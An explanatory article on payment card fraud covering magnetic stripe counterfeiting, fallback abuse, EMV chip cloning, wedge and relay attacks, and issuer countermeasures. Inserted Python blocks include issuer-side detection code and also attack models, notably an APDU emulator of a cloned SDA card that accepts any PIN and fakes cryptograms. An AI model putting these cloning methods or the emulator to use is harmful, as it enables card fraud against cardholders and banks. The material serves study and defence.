Counterfeit cards with magnetic stripe and chip

Let's start with the most common type of fraud: counterfeit cards. It has already been said that dynamic card authentication methods (online and offline) deal a devastating blow to this type of fraud. Without knowledge of the corresponding secret key (of the card, the issuer or the payment system), a chip card cannot be counterfeited, at the level of the cryptographic strength of RSA in the case of offline dynamic card authentication and of 3DES in the case of online authentication.

Counterfeit magnetic stripe cards

At the same time, if cards are personalized incorrectly or a weak authentication method is chosen, counterfeiting becomes possible. Below we try to systematize the possible ways of counterfeiting a card.

So, let's imagine that in our left hand we have a real hybrid card issued by a bank that is a member of some payment system, and in our right hand a blank hybrid card or a blank magnetic stripe card. In addition, like any self-respecting fraudster, we have a programmer for the chip used on the blank, equipment for encoding the card's magnetic stripe, and a machine for personalizing the plastic (printing, embossing, etc.).

Depending on which card is in our left hand, we will describe various counterfeiting methods by which, starting from the data of the left-hand card, we end up with a card in our right hand that, under certain circumstances, can be successfully used in the payment network.

First of all, we divide all possible methods into two classes: a counterfeit chip and a counterfeit magnetic stripe.

Counterfeit magnetic stripe. Possible schemes for counterfeiting the magnetic stripe of a hybrid card are shown in Fig. 3.

Case 1, option 1. Service code 2xx, hybrid terminal. In our right hand we have a card with only a magnetic stripe, onto which the magnetic stripe data of the left-hand card has been copied. We try to use it in a hybrid terminal, i.e. one that accepts both chip and magnetic stripe cards. The terminal must check the service code on the magnetic stripe and, if it is 2XX, must require that the transaction be performed using the chip.

The terminal must not allow a magnetic stripe transaction when the service code is 2XX unless it has decided to enter fallback mode after an attempt to perform the transaction with the chip has failed. The cashier needs a clear instruction, and the terminal display a clear message, that the transaction must be performed with the chip or be rejected.

In some terminal applications, despite the warnings, the merchant is still able to bypass the rule formulated above and conduct the transaction on the magnetic stripe. In this case, from the point of view of the payment system, the servicing (acquiring) bank is liable for any resulting fraud.

Even though liability in this case lies with the acquiring bank, the issuer is still advised to decline transactions in which, in MasterCard terms, the POS Data element (DE 061) indicates that the terminal is chip-capable but the transaction was performed on the magnetic stripe, while the POS Entry Mode (DE 022) is not 80X (the fallback case) but, for example, 90X (magnetic stripe read) or 05X (chip read).

Consider now case 1, option 1 with a magnetic stripe terminal. In our right hand we have the same card as in the previous case; for greater persuasiveness it may carry an additional, non-personalized chip. We try to use this card in a terminal that accepts only magnetic stripe cards.

If the issuer authorizes the transaction, the fraud succeeds, and liability for it lies with:

• the acquiring bank, if both it and the issuer of the counterfeited card are located in a region where the payment system's chip liability shift applies;

• the issuer, in all other cases.

To protect against this fraud when there is no chip on the counterfeit card, magnetic stripe terminals should, on reading a card with service code 2XX, display a message telling the merchant's cashier to check that the card carries a chip. If there is no chip, the cashier must refuse the card.

Case 1, option 2. Service code 1xx. The track 1 and track 2 data of the hybrid card are copied to a magnetic-stripe-only card, with the service code changed to 1XX. The card is used offline for sub-limit transactions (the transaction amount is below the terminal floor limit). Using the card online has little chance of success, since changing the service code breaks the integrity of the track 2 data and the CVV/CVC check at the issuer's processing centre will detect this. In the offline case, however, there is every opportunity to use the counterfeit card successfully, regardless of whether the terminal is hybrid or accepts only magnetic stripe cards.

If the counterfeit card is used in a hybrid terminal, full liability for the fraud lies with the card issuer. This is by far the most serious flaw in the concept of migrating to chip.

Indeed, both the card and the terminal support the new technology, and yet the card can be counterfeited without any violation of the card acceptance rules by the merchant. To avoid this type of fraud, payment systems introduced a rule that all magnetic stripe transactions in terminals capable of online operation must be sent to the issuer for authorization.

If the counterfeit card is used in a terminal that accepts only magnetic stripe cards, liability for the fraud lies with:

• the acquiring bank, if both it and the issuer of the counterfeited card are located in a region where the payment system's liability shift applies;

• the issuer, in all other cases.

Case 2. Hybrid card with a defective chip (forcing fallback to a counterfeit magnetic stripe). A blank hybrid card with a defective (for example, burned-out or incorrectly personalized) chip is used. The blank costs more (about 50 cents), but the data copied from the magnetic stripe of a real hybrid card can be encoded on its stripe and the card used in both magnetic stripe and hybrid terminals.

If the counterfeit card is used in a hybrid terminal, full liability for the fraud lies with the card issuer.

If the terminal accepts only magnetic stripe cards, liability for the fraud lies with:

• the acquiring bank, if both it and the issuer of the counterfeited card are located in a region where the payment system's liability shift applies;

• the issuer, in all other cases.

The only countermeasure against this type of fraud is for the issuer's processing centre to monitor the number of fallback transactions performed on each of its cards. If the number of fallback transactions on a given card exceeds a threshold, this is a signal for the issuer to investigate and make sure the transactions were performed by the legitimate cardholder.
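
The issuer-side checks recommended above (declining a 2xx card swiped at a chip-capable terminal outside fallback, and counting fallback transactions per card) can be expressed as follows. This is an added example, not part of the original post: the record layout, the field names (loosely following ISO 8583 DE 22 / DE 35 / DE 61), the threshold and the issuer's card table are assumptions, and the sample messages are constructed. The service-code consistency check is an additional simple test the issuer can make against its own personalization record; it catches the 1xx rewrite independently of the CVV/CVC check.

```python
"""Issuer-side authorization checks over constructed sample requests.

Added example, not from the original post. Field names loosely mirror ISO 8583 /
MasterCard usage (DE 22 POS Entry Mode, DE 35 Track 2, DE 61 POS data); the
record layout, the threshold and the issuer card table are assumptions.
"""
from collections import Counter

FALLBACK_THRESHOLD = 2  # assumption: investigate a PAN after more than 2 fallbacks

# The issuer's own record of how each PAN was personalized (constructed).
ISSUER_CARDS = {
    "5413330000000001": {"service_code": "201"},   # hybrid card, chip preferred
    "5413330000000019": {"service_code": "101"},   # magnetic-stripe-only card
}

def parse_track2(track2):
    """Split 'PAN=YYMMSSS...' into PAN, expiry and the 3-digit service code."""
    pan, _, rest = track2.partition("=")
    return {"pan": pan, "expiry": rest[:4], "service_code": rest[4:7]}

def check_authorization(msg):
    """Return a list of reasons to decline; an empty list means no finding."""
    findings = []
    t2 = parse_track2(msg["track2"])
    entry = msg["pos_entry_mode"]          # '90x' stripe, '80x' fallback, '05x' chip
    chip_capable = msg["terminal_chip_capable"]   # from the POS data element
    magstripe_txn = entry.startswith(("90", "80", "02"))

    # 1. Service code 2xx, chip-capable terminal, stripe read, but no fallback.
    if (t2["service_code"].startswith("2") and chip_capable
            and magstripe_txn and not entry.startswith("80")):
        findings.append("decline: 2xx card read on stripe at chip-capable terminal without fallback")

    # 2. Service code on the stripe differs from what the issuer personalized.
    issued = ISSUER_CARDS.get(t2["pan"])
    if issued and issued["service_code"] != t2["service_code"]:
        findings.append("decline: service code altered (%s -> %s)"
                        % (issued["service_code"], t2["service_code"]))
    return findings

def fallback_counts(msgs):
    """Count fallback transactions (entry mode 80x) per PAN."""
    counts = Counter()
    for m in msgs:
        if m["pos_entry_mode"].startswith("80"):
            counts[parse_track2(m["track2"])["pan"]] += 1
    return counts

def pans_over_fallback_threshold(msgs, threshold=FALLBACK_THRESHOLD):
    """PANs whose fallback count exceeds the threshold: candidates for investigation."""
    return {pan for pan, n in fallback_counts(msgs).items() if n > threshold}

T2_GENUINE = "5413330000000001=25122010000000000000"   # service code 201
T2_REWRITTEN = "5413330000000001=25121010000000000000" # service code changed to 101

SAMPLE_AUTHS = [   # constructed authorization requests
    {"track2": T2_GENUINE,   "pos_entry_mode": "051", "terminal_chip_capable": True},   # genuine chip read
    {"track2": T2_GENUINE,   "pos_entry_mode": "901", "terminal_chip_capable": True},   # swiped at chip terminal, no fallback
    {"track2": T2_GENUINE,   "pos_entry_mode": "901", "terminal_chip_capable": False},  # swiped at stripe-only terminal
    {"track2": T2_REWRITTEN, "pos_entry_mode": "901", "terminal_chip_capable": True},   # 1xx rewrite (case 1, option 2)
    {"track2": T2_GENUINE,   "pos_entry_mode": "801", "terminal_chip_capable": True},   # fallback 1
    {"track2": T2_GENUINE,   "pos_entry_mode": "801", "terminal_chip_capable": True},   # fallback 2
    {"track2": T2_GENUINE,   "pos_entry_mode": "801", "terminal_chip_capable": True},   # fallback 3
]

if __name__ == "__main__":
    for i, m in enumerate(SAMPLE_AUTHS):
        print(i, check_authorization(m) or "ok")
    print("investigate:", pans_over_fallback_threshold(SAMPLE_AUTHS))
```

Note that the third message (a 2xx card swiped at a stripe-only terminal) produces no finding: by the rules quoted above that transaction is legitimate at the terminal, and the protection there is the cashier's chip check and the liability shift, not an issuer rule.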

Payment systems are also taking measures to restrict the use of fallback in countries where the level of EMV compliance of terminals and cards is sufficiently high. In particular, in Europe fallback has already been abandoned for ATM transactions. In the near future, today's mandatory requirement to support fallback in POS terminals will become optional, and whether fallback authorization on the magnetic stripe is required will be decided at the country level.

Counterfeit Chip Cards

Counterfeit chip.
A cloned card is a card produced by an unauthorized person in the name of a legitimate payment system issuer. The fact that a card is cloned cannot be detected by the terminal when the transaction is processed offline.

To clone an SDA card, it is enough to have a microprocessor card with a programmer for it and a general knowledge of the EMV standard. A widely available card based on the PIC16F84 microcontroller can serve as the blank, for example.

Then the data of the real SDA card, including the FCI template, the AIP, the AFL and the records of the files referenced by the AFL, are transferred to the blank microprocessor card. Among the record data is the Signed Static Application Data object, the critical card data signed by the issuer.

The clone supports the SELECT, GET PROCESSING OPTIONS and READ RECORD commands in the standard way. To the VERIFY command it always responds that the entered PIN is correct.

To the GENERATE AC command the card responds as follows:

• if the terminal requests an ARQC or an AAC, the card returns an AAC, with an arbitrary 8-byte (16 hexadecimal digit) value as the cryptogram;

• if the terminal requests a TC, the card returns a TC, again with an arbitrary 8-byte value as the cryptogram.

Thus, if the terminal believes the transaction can be approved offline, the transaction with the cloned card is approved. In all other cases the clone insists on an offline decline. It follows that the cloned card never goes online and therefore cannot be blocked by the issuer through the script processing procedure.
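
The behaviour of the cloned SDA card just described, as an added example that is not part of the original post: a minimal APDU-level emulator in Python. Everything in COPIED is fabricated stand-in data (a real clone would carry the victim card's FCI, AIP, AFL, records and Signed Static Application Data verbatim); the command dispatch is what a PIC-class blank would be programmed to do.

```python
"""APDU-level model of the cloned SDA card described above.

Added example, not from the original post. COPIED holds fabricated stand-in
data; a real clone copies the victim card's objects byte for byte. The clone
answers SELECT / GPO / READ RECORD from the copied data, accepts any PIN, and
never produces an ARQC, so the issuer never sees it.
"""
import os

SW_OK, SW_NOT_FOUND, SW_INS_NOT_SUPPORTED = b"\x90\x00", b"\x6a\x82", b"\x6d\x00"
AAC, TC, ARQC = 0x00, 0x40, 0x80     # GENERATE AC P1 / CID encoding, bits 8-7

def tlv(tag, value):
    """Minimal BER-TLV encoder for values shorter than 128 bytes."""
    assert len(value) < 128
    return tag + bytes([len(value)]) + value

class ClonedSdaCard:
    def __init__(self, copied):
        self.copied = copied     # FCI, AIP, AFL and records read from the real card
        self.atc = 0

    def transmit(self, apdu):
        """Dispatch one command APDU; returns (response data, status word)."""
        cla, ins, p1, p2 = apdu[:4]
        if (cla, ins) == (0x00, 0xA4):                  # SELECT by AID
            return self.copied["fci"], SW_OK
        if (cla, ins) == (0x80, 0xA8):                  # GET PROCESSING OPTIONS, format 1
            return tlv(b"\x80", self.copied["aip"] + self.copied["afl"]), SW_OK
        if (cla, ins) == (0x00, 0xB2):                  # READ RECORD: P2 = SFI<<3 | 4
            rec = self.copied["records"].get((p2 >> 3, p1))
            return (rec, SW_OK) if rec else (b"", SW_NOT_FOUND)
        if (cla, ins) == (0x00, 0x20):                  # VERIFY: every PIN is "correct"
            return b"", SW_OK
        if (cla, ins) == (0x80, 0xAE):                  # GENERATE AC
            return self.generate_ac(p1 & 0xC0), SW_OK
        return b"", SW_INS_NOT_SUPPORTED

    def generate_ac(self, requested):
        """TC only when a TC is requested; AAC otherwise. Never an ARQC."""
        self.atc += 1
        cid = TC if requested == TC else AAC
        fake_cryptogram = os.urandom(8)    # 8 bytes the terminal cannot verify offline
        return tlv(b"\x77",
                   tlv(b"\x9f\x27", bytes([cid]))
                   + tlv(b"\x9f\x36", self.atc.to_bytes(2, "big"))
                   + tlv(b"\x9f\x26", fake_cryptogram))

def cid_from_response(resp):
    """Extract tag 9F27 (Cryptogram Information Data) from a format-2 response."""
    i = resp.find(b"\x9f\x27\x01")
    return resp[i + 3]

COPIED = {   # constructed stand-in for the data read from a real SDA card
    "fci": tlv(b"\x6f", tlv(b"\x84", b"\xa0\x00\x00\x00\x04\x10\x10")),
    "aip": b"\x40\x00",                        # byte 1 bit 7: SDA supported, nothing else
    "afl": b"\x08\x01\x01\x01",                # SFI 1, record 1, used for offline auth
    "records": {(1, 1): tlv(b"\x70", tlv(b"\x93", bytes(96)))},   # copied SSAD (dummy bytes)
}

def terminal_attempt(card, requested):
    """Issue GENERATE AC with the given P1 and return the CID the clone answers with."""
    data, sw = card.transmit(bytes([0x80, 0xAE, requested, 0x00, 0x00]))
    return cid_from_response(data) if sw == SW_OK else None

if __name__ == "__main__":
    card = ClonedSdaCard(COPIED)
    for name, req in (("TC", TC), ("ARQC", ARQC), ("AAC", AAC)):
        print("terminal requests", name, "-> clone answers CID", hex(terminal_attempt(card, req)))
```

The point to notice is what the clone refuses to do: it never returns an ARQC, so no authorization request, ARPC or issuer script ever reaches it, and under SDA nothing the terminal can check ties the random cryptogram to this card.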

The cost of cloning one card is a few dollars (blanks and a programmer for the chosen chip). The real card data needed for cloning can be collected at POS terminals in exactly the same way as it is collected today for magnetic stripe cards.

Let's note the following. Suppose the card is cloned from a real card that supports offline dynamic authentication.

In this case the same data is transferred to the clone as when cloning an SDA card. Obviously, if such a clone is used in a terminal that supports only the SDA method, it has a 100% chance of success, provided the terminal approves the transaction offline. That is why payment systems made support for DDA mandatory on POS terminals (with the exception of "Online Only" terminals, for which support for offline card authentication is optional).

Similarly, if a DDA/CDA card is cloned onto an SDA card and the terminal does not support offline card authentication at all, then, if the card has no mechanism by which the issuer can verify that card authentication actually took place, the terminal may deceive the issuer by claiming to have performed offline dynamic card authentication without actually doing so. Here the merchant's deception is not committed with fraudulent intent but in order to appear compliant with the payment system's requirement. Fraudsters can take advantage of this deception by successfully using cloned cards in such terminals.

Another question then arises: can a DDA/CDA card be cloned onto a static authentication card and used in a terminal that supports the DDA/CDA dynamic authentication methods? In general the answer is no, since to clone a DDA/CDA card for use under these conditions it is necessary to know the card's private key.

At the same time, in some cases a DDA/CDA card can be cloned. If, for example, a DDA/CDA card also directly supports the SDA method (via the AIP) and does not carry an SDA Tag List data object in its file structure, then such a card can be cloned. Indeed, having all the openly readable card data at our disposal, it is easy to modify the AIP on the clone so that it indicates support for SDA only. The clone will then be used successfully for offline processing. Note that the modification of the AIP goes unnoticed by the terminal, since the AIP is not among the signed data whose integrity is checked in the SDA card authentication procedure. We remind the reader,

Note that to avoid cloning, a DDA card is better off not directly supporting SDA (SDA is performed indirectly during verification of the card key certificate), i.e. in particular it should not contain a Signed Static Application Data object. In that case, even if the card has no SDA Tag List element, it cannot be cloned onto an SDA card, since the necessary data (the Signed Static Application Data) is absent.
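
To make the cloning conditions above concrete, here is an added model (not from the original post) of what the terminal hashes during SDA and how three personalization choices play out: no SDA Tag List, an SDA Tag List naming the AIP (tag 82), and no Signed Static Application Data at all. The RSA signature and recovery are replaced by an HMAC-SHA1 stand-in so the block runs on the standard library; the coverage rule (the AFL records flagged for offline authentication, followed by the objects named in the SDA Tag List, tag 9F4A) follows EMV Book 2, while the record contents and key material are constructed.

```python
"""What SDA signs, and why flipping the AIP can go unnoticed.

Added example, not from the original post. issuer_sign / terminal_sda use an
HMAC-SHA1 stand-in for RSA signing and recovery (the real terminal recovers the
hash with the issuer public key from the issuer certificate). The coverage rule
follows EMV Book 2; card contents and keys are constructed.
"""
import hmac, hashlib

ISSUER_KEY = b"issuer-private-key-stand-in"   # stand-in for the issuer RSA key pair
AIP_SDA_ONLY = b"\x40\x00"    # byte 1 bit 7: SDA supported
AIP_SDA_DDA  = b"\x60\x00"    # SDA and DDA supported (bits 7 and 6)
AIP_DDA_ONLY = b"\x20\x00"    # DDA only, no direct SDA support

def static_data_to_auth(card):
    """Bytes covered by the SDA signature: AFL records flagged for offline
    authentication, then the objects named in the SDA Tag List (9F4A)."""
    data = b"".join(card["auth_records"])
    if card.get("sda_tag_list") == b"\x82":     # tag list names the AIP -> AIP is signed
        data += card["aip"]
    return data

def issuer_sign(card):
    """Stand-in for producing Signed Static Application Data (tag 93)."""
    return hmac.new(ISSUER_KEY, static_data_to_auth(card), hashlib.sha1).digest()

def terminal_sda(card):
    """Terminal side. SDA succeeds only if the card claims SDA, carries tag 93,
    and the recovered hash matches the static data actually read."""
    if not card["aip"][0] & 0x40:
        return False                          # card does not offer SDA
    ssad = card.get("ssad")
    if ssad is None:
        return False                          # nothing to verify: SDA fails
    return hmac.compare_digest(ssad, issuer_sign(card))

def personalize(aip, with_ssad=True, sda_tag_list=None):
    """Issuer personalization: one authenticated record, optional 93 and 9F4A."""
    card = {"aip": aip,
            "auth_records": [b"\x70\x05\x5a\x03\x54\x13\x33"],   # constructed record
            "sda_tag_list": sda_tag_list}
    if with_ssad:
        card["ssad"] = issuer_sign(card)
    return card

def clone_as_sda_only(real):
    """Fraudster copies every readable object and rewrites the AIP to 'SDA only'."""
    clone = dict(real)
    clone["aip"] = AIP_SDA_ONLY
    return clone

def clone_survives_sda(aip, with_ssad=True, sda_tag_list=None):
    """Does an AIP-flipped clone of a card personalized this way pass SDA?"""
    return terminal_sda(clone_as_sda_only(personalize(aip, with_ssad, sda_tag_list)))

if __name__ == "__main__":
    print("DDA card with SSAD, no SDA Tag List :", clone_survives_sda(AIP_SDA_DDA))
    print("DDA card with SSAD, 9F4A = 82       :", clone_survives_sda(AIP_SDA_DDA, True, b"\x82"))
    print("DDA card without SSAD               :", clone_survives_sda(AIP_DDA_ONLY, False))
```

The first case is the vulnerable personalization described above: the AIP is read but not signed, so the terminal accepts the clone. Naming tag 82 in the SDA Tag List puts the AIP under the signature and the flip is caught; omitting tag 93 entirely leaves the clone with nothing to present.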

The absence of direct SDA support will not affect the card's acceptance, since all terminals that perform offline card authentication support DDA.

Although correctly personalized DDA cards cannot be cloned, they do not ensure the integrity of the data exchange between card and terminal. An attack known as the "two-chip attack" is possible and works as follows. A printed circuit board carrying two chips is used: a bank chip and an emulator chip. The bank chip is a chip personalized by the bank for a DDA card. The emulator chip mediates the data exchange between the bank chip and the terminal, modifying the dialogue where necessary. It is the emulator chip that is inserted into the terminal's card reader and communicates with the terminal; it analyzes the command data received from the terminal and, where necessary, modifies it to the fraudster's benefit.

Here are the simplest examples of such modification. If the terminal requested a TC in the GENERATE AC command, and the card (the bank chip) decides to go online or to decline offline, the emulator chip alters the unprotected Cryptogram Information Data so that the card appears to respond with a TC. The transaction is thus approved, although by the card's decision it should have been declined or sent to the issuer for authorization.

Another example: the emulator chip, having received the transaction amount from the terminal, reduces it to a value at which the card is willing to approve the transaction offline.

Such an emulator is called a wedge device in the literature. It can be implemented not only on the card's printed circuit board but also on the POS terminal side; what matters is that it sits in the middle of the exchange between card and terminal.

The problem of ensuring the integrity of the card-terminal exchange is solved by CDA cards. They protect the integrity of the most important data exchanged between card and terminal during transaction processing, so the exchange cannot be modified in a way that is invisible to the terminal.

In addition, CDA cards show better performance (shorter transaction time) than DDA cards, because the INTERNAL AUTHENTICATE command is not used for offline card authentication, which reduces the communication between terminal and card.

Integrity of the exchange with the terminal and higher performance make CDA cards attractive for contactless payments. In particular, the MasterCard PayPass standard considers only CDA as the dynamic authentication method.

At the same time, CDA cards have a number of weaknesses. First, the modulus of the CDA card key may not exceed 205 bytes. Today this limitation is not onerous, since smaller card keys are mostly used, but it may become noticeable in the future: payment systems already distribute their own keys of 248 bytes (the maximum key size under the EMV standard), allowing issuers and cards to use keys of comparable size.

Secondly, if the acquiring bank (or payment system) is careless in managing the loading of the payment system public keys onto its terminals, it may happen that some system key has not been loaded (or not loaded in time) onto a terminal. In that case, all CDA cards of issuers whose keys are certified under the missing system key simply cannot be serviced at that terminal.

Indeed, having received the card's response to GENERATE AC, the terminal cannot recover the data from the Signed Dynamic Application Data and has to decline the transaction. This happens even if the card returned an ARQC, asking for online processing: without the system key the ARQC cannot be recovered from the Signed Dynamic Application Data object, and the transaction must be declined.

Note that with a DDA card the transaction could still be performed online when the terminal lacks the corresponding system key. CDA, unlike the other authentication methods, deprives the card of the opportunity to request issuer authorization when card authentication fails.
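
The two properties just discussed, the wedge device rewriting the Cryptogram Information Data under DDA versus CDA, and the CDA card's inability to go online when the terminal lacks the system key, can be shown in one small model. This is an added example, not from the original post: the signature over the dynamic data is an HMAC-SHA1 stand-in keyed per card (real cards sign with the ICC RSA private key, verified through the issuer and CA certificate chain), the cryptogram is a truncated HMAC standing in for 3DES, and ca_key_present is an assumed flag modelling whether the terminal holds the payment system public key needed to recover the card's signed data. Message layouts are simplified to the fields that matter.

```python
"""Wedge attack on the GENERATE AC response under DDA vs CDA, and CDA without a CA key.

Added example, not from the original post. Signatures and cryptograms are
HMAC-SHA1 stand-ins (real cards use RSA for SDAD and 3DES for the AC);
ca_key_present models whether the terminal holds the system public key.
"""
import hmac, hashlib, os

AAC, TC, ARQC = 0x00, 0x40, 0x80           # Cryptogram Information Data, bits 8-7
STRENGTH = {TC: 2, ARQC: 1, AAC: 0}        # a card may not answer 'stronger' than asked

def sign_dynamic(key, cid, atc, ac, un, amount):
    """Stand-in for Signed Dynamic Application Data: covers CID, ATC, AC, the
    terminal's Unpredictable Number and the amount the card actually saw."""
    msg = bytes([cid]) + atc + ac + un + amount.to_bytes(6, "big")
    return hmac.new(key, msg, hashlib.sha1).digest()

class Card:
    def __init__(self, mode, decision):
        self.mode = mode                 # "DDA" or "CDA"
        self.decision = decision         # outcome of the card's own risk management
        self.ac_key = os.urandom(16)     # stand-in for the 3DES session key
        self.icc_key = os.urandom(16)    # stand-in for the ICC private key
        self.public_key = self.icc_key   # stand-in: verifier uses the same key
        self.atc = 0

    def generate_ac(self, requested, un, amount):
        cid = self.decision if STRENGTH[self.decision] <= STRENGTH[requested] else requested
        self.atc += 1
        atc = self.atc.to_bytes(2, "big")
        ac = hmac.new(self.ac_key, amount.to_bytes(6, "big") + un + atc, hashlib.sha1).digest()[:8]
        resp = {"cid": cid, "atc": atc, "ac": ac}
        if self.mode == "CDA":           # CDA: the response itself is signed
            resp["sdad"] = sign_dynamic(self.icc_key, cid, atc, ac, un, amount)
        return resp

def wedge_force_tc(resp):
    """Emulator chip: rewrite the unprotected CID so the answer reads as a TC."""
    forged = dict(resp)
    forged["cid"] = TC
    return forged

def terminal_process(card, requested, amount, wedge=None, ca_key_present=True):
    """Terminal side: returns 'APPROVE', 'ONLINE' or 'DECLINE'."""
    un = os.urandom(4)
    resp = card.generate_ac(requested, un, amount)
    if wedge is not None:
        resp = wedge(resp)               # the wedge sits between card and terminal
    if card.mode == "CDA":
        if not ca_key_present:
            return "DECLINE"             # cannot recover SDAD, so cannot even go online
        expected = sign_dynamic(card.public_key, resp["cid"], resp["atc"], resp["ac"], un, amount)
        if not hmac.compare_digest(resp["sdad"], expected):
            return "DECLINE"             # CID, AC or amount tampered with
    elif not ca_key_present and resp["cid"] == TC:
        return "ONLINE"                  # DDA failed: TVR bit set, terminal goes online instead
    return {TC: "APPROVE", ARQC: "ONLINE", AAC: "DECLINE"}[resp["cid"]]

if __name__ == "__main__":
    for mode in ("DDA", "CDA"):
        card = Card(mode, ARQC)          # the bank chip wants to go online
        print(mode, "honest:", terminal_process(card, TC, 2000),
              "| wedged:", terminal_process(card, TC, 2000, wedge=wedge_force_tc),
              "| no CA key:", terminal_process(card, TC, 2000, ca_key_present=False))
```

Under DDA the forged TC is accepted because nothing the card signed covers the CID; under CDA the same forgery fails verification. The last column shows the flip side: the DDA card still reaches the issuer when the terminal lacks the system key, while the CDA card is declined outright.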

Summarizing the above, we list the methods of cloning a hybrid card for use in offline authorization mode:

1) if the hybrid card is an SDA card, it is easily cloned onto an SDA card;

2) if we are dealing with a DDA/CDA card that also directly supports SDA (there is a Signed Static Application Data object on the card), then it can be cloned onto an SDA card:

• by changing the card profile (Application Interchange Profile) so that it indicates SDA support only, which remains invisible to the terminal provided the card carries no SDA Tag List object;

• when the clone is used in terminals that, in violation of payment system rules, support only the SDA method or support no offline card authentication method at all;

• when a card personalized under a false system key is used in a terminal onto which that false system key has previously been loaded;

3) a DDA card can be "upgraded" by building a printed circuit board around it that carries, alongside the real card's chip, a second emulator chip operating according to the two-chip attack scheme.

Once again, note that counterfeiting a chip is in practice possible only by cloning it, i.e. transferring the data of a real chip to the chip used to produce the fraudulent card. Indeed, to change the data on an already personalized chip there are only two ways: through the script processing procedure or in card personalization mode.

In script processing, the PUT DATA and UPDATE RECORD commands are used to modify records and individual data objects. These commands are protected by MACs and, where necessary, by data encryption. In addition, they are most often executed only after the card has authenticated the issuer.

Therefore, fraud through script processing is possible only when the secret card/issuer keys used to generate the cryptogram and to ensure the integrity of the data exchange (MAC generation) have been compromised.

The keys used in the personalization phase and in script processing are different.

Forging chip data in card personalization mode is likewise possible only as a result of a compromise of the card issuer's or card manufacturer's keys.

The chip manufacturer assigns a serial number to each chip and loads into it a secret key of the card supplier, derived from the card supplier's master key using the chip serial number and a key identifier as diversification data.

Then the card supplier, after embedding the chip in the plastic card, performs the card pre-personalization procedure. At the start of the procedure the card must authenticate the card supplier using the chip's secret key loaded earlier by the manufacturer and known only to the card and its supplier. Only after successful authentication can the supplier perform pre-personalization.

From a security standpoint, pre-personalization consists of loading onto the card keys derived from the card issuer's secret key and the KEY DATA element, which includes the chip serial number and the issuer's key identifier. These keys are used to derive the card's session keys at the personalization stage, for mutual dynamic authentication of the card and the personalization machine and for the confidentiality and integrity of the data transferred from the personalization machine to the card.

Thus, at the personalization stage a separate set of keys is used, different from the keys used when performing a transaction.

It follows that at the card personalization stage fraud is possible only if the secret card (issuer) keys are compromised.

Recently, information has appeared in print about a scheme of virtual card cloning in real time (a relay attack). The scheme applies to any card (SDA, DDA, CDA), including cards supporting secure PIN verification. The idea is that the fraudsters have a terminal under their control, located, say, in a restaurant, and a card with an application that works over both a contact interface (ISO 7816) and a contactless radio interface (a vicinity interface, for example according to ISO 15693 or ISO 18000). The purpose of the fraudulent card application is to relay data between the real POS terminal and the fraudsters' equipment.

The scheme looks like this. A fraudster with a backpack over his shoulder goes, for example, to a jewelry store, chooses a piece of jewelry for 2000 euros and waits for a call from an accomplice in the restaurant. At that moment an unsuspecting restaurant customer decides to pay for a 20-euro lunch with his card. The accomplice calls the fraudster with the backpack, who goes to the jewelry store's cash desk to pay for the jewelry with the fraudulent card.

Next, the fraudulent card is inserted into the reader of the real POS terminal and begins relaying the commands it receives from the real terminal over the radio interface to the fraudster's equipment in the backpack. That equipment in turn forwards the commands to the fraudulent POS terminal, which delivers them to the card of the unsuspecting restaurant customer. The responses of the customer's card travel back to the real terminal in the jewelry store by the reverse route. The scheme is shown in Fig. 4.

Obviously, the fraudulent transaction can be carried out both online and offline. Moreover, on completion of the transaction the restaurant customer receives a receipt from the fraudulent terminal showing his card details and an amount of 20 euros. The only problem is that the real terminal will, in general, print a receipt with the details of the victim's card rather than those embossed on the fraudulent card. But here, too, not all is lost. Firstly, not every cashier compares the receipt with the data printed (embossed) on the surface of the card. Secondly, restaurants have regulars, whose card details can be applied to the fraudulent card in advance.
 